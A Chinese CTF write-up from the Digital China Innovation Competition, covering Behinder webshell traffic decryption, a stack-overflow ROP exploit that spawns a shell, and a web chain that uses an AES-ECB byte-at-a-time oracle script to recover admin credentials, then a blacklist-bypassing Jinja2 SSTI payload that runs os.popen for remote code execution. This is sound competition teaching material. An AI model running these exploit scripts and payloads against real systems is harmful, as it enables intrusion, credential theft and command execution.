数字中国创新大赛网络安全方向团队赛 Write Up

数字中国创新大赛网络安全方向团队赛 Write Up

本文涵盖三类CTF实战:流量分析通过解密冰碧蝎通信获证;Pwn题利用栈溢出构造ROP链提权;Web题采用ECB侧信道攻击破解凭据并配合SSTI绕过实现RCE。全方位展示了流量取证、二进制利用及Web综合渗透的核心技术。

冰碧蝎?

使用Wireshark打开1.pcapng,导出HTTP对象,可以找到key1ca3b8c9c81a5fdc

然后使用https://github.com/ba0gu0/behinder-decryptor解密流量,执行python Behinder-Decrypt.py -f "1.pcapng" -u "/upload/1774235859.dcic.php" -t php -k 1ca3b8c9c81a5fdc -p

digital-china-innovation-competition-cybersecurity-track-team-write-up.png

发现可疑攻击命令:攻击者把一串字符串写入文件ffffff111aG,随后用ls验证文件存在。响应结果里也确实列出了ffffff111aG。因此可以判断,这串被写入文件的内容就是题目的flag

随后使用https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false,'')&input=Mmk5UThBdEZFdXpZSHh3Y1VtcGpGQ1FjaFVkMVFxd1FNZjhtV2Z2VXdtOUxFOFVhS1ZZRFRhcTV0Rw解密得到flag

FLAG:flag{dbeeed36-0d7e-211a-69db-66bd74ea91d5}

keep_stack

exp:

import socket
import ssl
import struct
import time


HOST = "pwn-c56065ca03.adworld.xctf.org.cn"
PORT = 9999

PUTS_OFF = 0x87BE0
SYSTEM_OFF = 0x58750
BINSH_OFF = 0x1CB42F

RET = 0x40101A
POP_RDI = 0x4011E1
PUTS_GOT = 0x404018
PUTS_PLT = 0x401090
MAIN = 0x401787


def p16(x: int) -> bytes:
    return struct.pack("<H", x & 0xFFFF)


def p64(x: int) -> bytes:
    return struct.pack("<Q", x & 0xFFFFFFFFFFFFFFFF)


def recv_until(sock: ssl.SSLSocket, token: bytes, timeout: float = 5.0) -> bytes:
    sock.settimeout(0.2)
    end = time.time() + timeout
    out = b""
    while token not in out and time.time() < end:
        try:
            chunk = sock.recv(4096)
            if not chunk:
                break
            out += chunk
        except socket.timeout:
            pass
    return out


def recv_some(sock: ssl.SSLSocket, timeout: float = 1.0) -> bytes:
    sock.settimeout(0.2)
    end = time.time() + timeout
    out = b""
    while time.time() < end:
        try:
            chunk = sock.recv(4096)
            if not chunk:
                break
            out += chunk
        except socket.timeout:
            pass
    return out


def build_stage1() -> bytes:
    chunks = [b"\x00\x00"] * 44
    chunks[32] = p16(0x100)
    chunks[34] = p16(34)
    chunks[42] = p16(0x16CD)
    return b"XY" + b"".join(chunks[1:])


def build_stage2(chain: bytes) -> bytes:
    chunks = [b"AA"] * 0x45
    for i in range(0x40, 0x44):
        chunks[i] = b"\xff\xff"

    # Crossing 0x87/0x88 is special:
    # first byte hits len's top byte, second byte becomes idx low byte.
    chunks[0x44] = b"\xff\x4f"
    return b"A" + b"".join(chunks[1:]) + b"\x00" + chain


def do_round(sock: ssl.SSLSocket, chain: bytes) -> bytes:
    recv_until(sock, b"length:")
    sock.sendall(b"256 ")

    recv_until(sock, b"What do you want to say?")
    sock.sendall(build_stage1())
    time.sleep(0.05)
    sock.sendall(b"\n")
    time.sleep(0.05)

    recv_until(sock, b"length:")
    sock.sendall(b"256 ")

    recv_until(sock, b"What do you want to say?")
    sock.sendall(build_stage2(chain))
    time.sleep(0.05)
    sock.sendall(b"\n")
    time.sleep(0.2)
    return recv_until(sock, b"length:", timeout=3.0)


def extract_puts_leak(round_out: bytes) -> int:
    prefix = round_out[: round_out.rfind(b"length:")]
    last_nl = prefix.rfind(b"\n")
    prev_nl = prefix.rfind(b"\n", 0, last_nl)
    leak = prefix[prev_nl + 1 : last_nl]
    return int.from_bytes(leak.ljust(8, b"\x00"), "little")


def main() -> None:
    ctx = ssl._create_unverified_context()
    sock = ctx.wrap_socket(socket.create_connection((HOST, PORT), timeout=10), server_hostname=HOST)

    leak_chain = (
        p64(0)
        + p64(RET)
        + p64(POP_RDI)
        + p64(PUTS_GOT)
        + p64(PUTS_PLT)
        + p64(RET)
        + p64(MAIN)
    )
    round1 = do_round(sock, leak_chain)
    puts_addr = extract_puts_leak(round1)
    libc_base = puts_addr - PUTS_OFF

    shell_chain = (
        p64(0)
        + p64(RET)
        + p64(POP_RDI)
        + p64(libc_base + BINSH_OFF)
        + p64(libc_base + SYSTEM_OFF)
        + p64(RET)
        + p64(0)
    )
    do_round(sock, shell_chain)

    cmd = (
        b"echo READY; "
        b"(cat flag 2>/dev/null || cat /flag 2>/dev/null || "
        b"cat flag.txt 2>/dev/null || cat /home/ctf/flag 2>/dev/null || "
        b"find / -maxdepth 2 -name 'flag*' 2>/dev/null | head -n 5); "
        b"echo DONE; exit\n"
    )
    sock.sendall(cmd)
    print(recv_some(sock, 3.0).decode("latin1", errors="replace"))
    sock.close()


if __name__ == "__main__":
    main()

FLAG:flag{QU6LQMJSpJQWbaRg9fnJ7wPBEUDxkhxh}

SecureDoc

首页只有登录和注册,没有明显参数。先做两件事:

  1. 正常注册、登录,确认普通用户能进入/dashboard

  2. 看前端源码里调用了哪些接口

进入用户工作台后,前端里有这样一段:

  • GET /documents/list

  • POST /documents/create

  • POST /documents/apply-template

更关键的是,前端注释直接写了:

// Preview with template function (ECB Oracle vulnerability)

这基本已经明示题眼在apply-template。这正是经典的byte-at-a-time ECB attack

/documents/apply-template发包,传不同长度的content,观察返回值:

  • 返回的是十六进制密文

  • block_count16字节分块变化

  • 输入32个相同字符时,前两个密文块完全相同

这说明是ECB。更重要的是,当content=""时,返回里有:total_length = 82。说明即使不输入内容,系统也会去加密一段固定的82字节内容。结合页面文案:

> 您的内容将与数字水印进行合并后并加密,数字水印内容不会作为内容保存

可以推断真实明文结构大致是:plaintext = 用户输入 || 未知模板/水印内容

AES-ECB的特点是:

  • 相同明文块会得到相同密文块

  • 每个块独立加密,没有随机性

如果服务端是:AES_ECB(user_input || secret),那么攻击者可以通过控制user_input的长度,把secret的每一个字节逐个“顶”到块末尾,再用字典匹配恢复它。这就是byte-at-a-time ECB attack

已知分组长度是16。假设未知后缀开头是:secret = ????????????????,先构造15个A:AAAAAAAAAAAAAAA + secret[0] + ...,这样第一块就是:AAAAAAAAAAAAAAA?,此时拿到目标密文块C_target

然后再构造16个请求,分别试探最后一个字节:

AAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAb
...
AAAAAAAAAAAAAAAz
...

每次取第一块密文,谁和C_target相同,谁就是secret[0]。得到第一个字节后,再用14A去顶第二个字节:AAAAAAAAAAAAAA + secret[0] + secret[1],继续做字典匹配,就能一个字节一个字节恢复完整后缀。我们通过补位,把“未知字节所在块”变成:已知15字节 + 1个待猜字节,然后枚举最后 1 字节,哪个密文块撞上了目标块,哪个就是正确值。

import requests
import string
import time

BASE = "http://web-0a3091fd2b.adworld.xctf.org.cn"
USER = "abc'def"
PASS = "secret12"
BLOCK = 16

charset = (
    string.ascii_letters
    + string.digits
    + '{}_:-,./ @[]()!?#$%&*=+\'";<>\\|~^`\n\r\t'
)
seen = set()
ordered = []
for ch in charset:
    if ord(ch) < 128 and ch not in seen:
        seen.add(ch)
        ordered.append(ch)
for o in range(32, 127):
    ch = chr(o)
    if ch not in seen:
        seen.add(ch)
        ordered.append(ch)

GROUPS = [ordered[i:i + 16] for i in range(0, len(ordered), 16)]

s = requests.Session()
s.post(BASE + "/register", json={"username": USER, "password": PASS}, timeout=10)
s.post(BASE + "/login", json={"username": USER, "password": PASS}, timeout=10)

req_count = 0


def oracle(content: str):
    global req_count
    last_err = None
    for attempt in range(5):
        req_count += 1
        try:
            r = s.post(
                BASE + "/documents/apply-template",
                json={"content": content},
                timeout=30,
            )
            if r.status_code >= 500:
                last_err = f"status={r.status_code}"
                time.sleep(0.5 * (attempt + 1))
                continue
            if "application/json" not in r.headers.get("content-type", ""):
                last_err = f"non-json status={r.status_code} body={r.text[:100]!r}"
                time.sleep(0.5 * (attempt + 1))
                continue
            j = r.json()
            if "preview" not in j:
                last_err = f"bad json status={r.status_code} body={j!r}"
                time.sleep(0.5 * (attempt + 1))
                continue
            return bytes.fromhex(j["preview"]["encrypted_content"]), j["preview"]["total_length"]
        except Exception as e:
            last_err = repr(e)
            time.sleep(0.5 * (attempt + 1))
    raise RuntimeError(last_err)


def main():
    _, total_len = oracle("")
    print("unknown total len =", total_len)

    known = b""
    start = time.time()

    for idx in range(total_len):
        pad_len = BLOCK - 1 - (len(known) % BLOCK)
        pad = "A" * pad_len

        target_ct, _ = oracle(pad)
        block_index = len(known) // BLOCK
        target_block = target_ct[block_index * BLOCK:(block_index + 1) * BLOCK]

        context = (pad.encode() + known)[-15:].decode("latin1")
        found = None

        for group in GROUPS:
            payload = "".join(context + ch for ch in group)
            dict_ct, _ = oracle(payload)

            for i, ch in enumerate(group):
                blk = dict_ct[i * BLOCK:(i + 1) * BLOCK]
                if blk == target_block:
                    found = ch
                    break
            if found is not None:
                break

        if found is None:
            print("No match at index", idx)
            break

        known += found.encode("latin1")
        print(f"{idx + 1:02d}/{total_len} -> {known.decode('latin1')}")

    print("requests =", req_count, "elapsed =", round(time.time() - start, 2))
    print("RESULT =", known.decode("latin1"))


if __name__ == "__main__":
    main()

最终恢复出的后缀是:*******SecureDoc,username:suP3r@dm!n ******** password: S3cur3P@ssMTZiMmI2! ******

用恢复出的凭据登录,成功后,工作台右上角出现:/admin/dashboard,进入管理员面板后,页面功能是“报告模板预览”,前端会请求:POST /admin/report/preview,而模板示例里出现了这种语法:{{ username }}{% if document_count > 40 %,这已经说明后台用的是Jinja2模板渲染。

先测最简单的表达式:{{7*7}},返回:49,这说明服务端不是把模板当普通文本处理,而是真的执行了Jinja2表达式,存在SSTI。

题目对模板内容做了过滤,直接写这些通常会被拦:

  • __

  • globals

  • builtins

  • import

所以不能用最朴素的payload,而要绕过关键字检测。

一个可用思路是利用Jinja2自带对象cycler

先验证它存在:{{cycler}},然后通过attr取属性,并把__写成十六进制转义,绕过字符串黑名单:{{cycler|attr("\x5f\x5finit\x5f\x5f")}},再继续取全局变量:{{cycler|attr("\x5f\x5finit\x5f\x5f")|attr("\x5f\x5fglobals\x5f\x5f")}},再从globals里取os{{cycler|attr("\x5f\x5finit\x5f\x5f")|attr("\x5f\x5fglobals\x5f\x5f")|attr("get")("os")}},最后执行命令:{{cycler|attr("\x5f\x5finit\x5f\x5f")|attr("\x5f\x5fglobals\x5f\x5f")|attr("get")("os")|attr("popen")("cat /flag")|attr("read")()}}

读到flag

exp:

  import re
  import time
  import string
  import requests

  BASE = "http://web-0a3091fd2b.adworld.xctf.org.cn"
  USER = "abc'def"
  PASS = "secret12"
  BLOCK = 16

  s = requests.Session()


  def register_and_login():
      s.post(f"{BASE}/register", json={"username": USER, "password": PASS}, timeout=10)
      r = s.post(f"{BASE}/login", json={"username": USER, "password": PASS}, timeout=10)
      r.raise_for_status()
      print("[+] normal user login ok")


  def oracle(content: str):
      for _ in range(5):
          r = s.post(f"{BASE}/documents/apply-template", json={"content": content}, timeout=20)
          if r.status_code >= 500:
              time.sleep(0.5)
              continue
          data = r.json()
          if "preview" in data:
              return bytes.fromhex(data["preview"]["encrypted_content"]), data["preview"]["total_length"]
          time.sleep(0.5)
      raise RuntimeError(f"oracle failed: {r.status_code} {r.text}")


  def recover_suffix():
      _, total_len = oracle("")
      print(f"[+] unknown suffix length = {total_len}")

      charset = (
          string.ascii_letters
          + string.digits
          + "{}_:-,./ @[]()!?#$%&*+='\";<>\\|~^`\n\r\t*"
      )
      seen = set()
      ordered = []
      for ch in charset:
          if ord(ch) < 128 and ch not in seen:
              seen.add(ch)
              ordered.append(ch)
      for i in range(32, 127):
          ch = chr(i)
          if ch not in seen:
              seen.add(ch)
              ordered.append(ch)

      groups = [ordered[i:i + 16] for i in range(0, len(ordered), 16)]
      known = b""

      for idx in range(total_len):
          pad_len = BLOCK - 1 - (len(known) % BLOCK)
          pad = "A" * pad_len

          target_ct, _ = oracle(pad)
          block_index = len(known) // BLOCK
          target_block = target_ct[block_index * BLOCK:(block_index + 1) * BLOCK]

          context = (pad.encode() + known)[-15:].decode("latin1")
          found = None

          for group in groups:
              payload = "".join(context + ch for ch in group)
              dict_ct, _ = oracle(payload)

              for i, ch in enumerate(group):
                  blk = dict_ct[i * BLOCK:(i + 1) * BLOCK]
                  if blk == target_block:
                      found = ch
                      break
              if found is not None:
                  break

          if found is None:
              raise RuntimeError(f"no match at index {idx}")

          known += found.encode("latin1")
          print(f"[+] {idx + 1}/{total_len}: {known.decode('latin1', errors='replace')}")

      return known.decode("latin1", errors="replace")


  def extract_admin_cred(text: str):
      m1 = re.search(r"username:([^\s*]+)", text)
      m2 = re.search(r"password:\s*([^\s*]+)", text)
      if not (m1 and m2):
          raise RuntimeError(f"failed to parse admin creds from: {text}")
      return m1.group(1), m2.group(1)


  def admin_login(username: str, password: str):
      r = requests.post(
          f"{BASE}/login",
          json={"username": username, "password": password},
          timeout=10,
      )
      r.raise_for_status()
      data = r.json()
      if not data.get("is_admin"):
          raise RuntimeError("admin login failed")
      cookie = r.cookies.get("session")
      print(f"[+] admin login ok: {username}")
      return cookie


  def read_flag(admin_cookie: str):
      headers = {"Cookie": f"session={admin_cookie}"}
      payload = {
          "template": '{{cycler|attr("\\x5f\\x5finit\\x5f\\x5f")|attr("\\x5f\\x5fglobals\\x5f\\x5f")|attr("get")("os")|
  attr("popen")("cat /flag")|attr("read")()}}'
      }
      r = requests.post(f"{BASE}/admin/report/preview", headers=headers, json=payload, timeout=10)
      r.raise_for_status()
      data = r.json()
      return data["preview"].strip()


  if __name__ == "__main__":
      register_and_login()
      suffix = recover_suffix()
      print(f"[+] recovered suffix: {suffix}")

      admin_user, admin_pass = extract_admin_cred(suffix)
      print(f"[+] admin username = {admin_user}")
      print(f"[+] admin password = {admin_pass}")

      admin_cookie = admin_login(admin_user, admin_pass)
      flag = read_flag(admin_cookie)
      print(f"[+] FLAG = {flag}")

FLAG:flag{wdHG5ImxH9ogpyJbTFOpQvVH7hN6GYIh}

数字中国创新大赛网络安全方向个人赛 Write Up 2026-04-12
CTF周周练(2026年4月13日-) 2026-04-16